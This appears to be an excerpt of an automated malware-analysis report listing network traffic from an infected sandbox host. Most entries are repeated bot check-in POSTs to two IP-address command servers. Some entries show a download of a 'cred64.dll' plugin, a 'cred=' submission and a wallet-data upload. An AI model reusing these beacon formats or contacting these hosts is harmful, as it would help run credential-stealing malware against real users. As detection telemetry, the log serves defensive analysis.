                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: GET /g8kdkeXs2qL/Plugins/cred64.dll HTTP/1.1Host: 45.66.230.123
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTMzMTI=Host: 45.66.230.123Content-Length: 13472Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
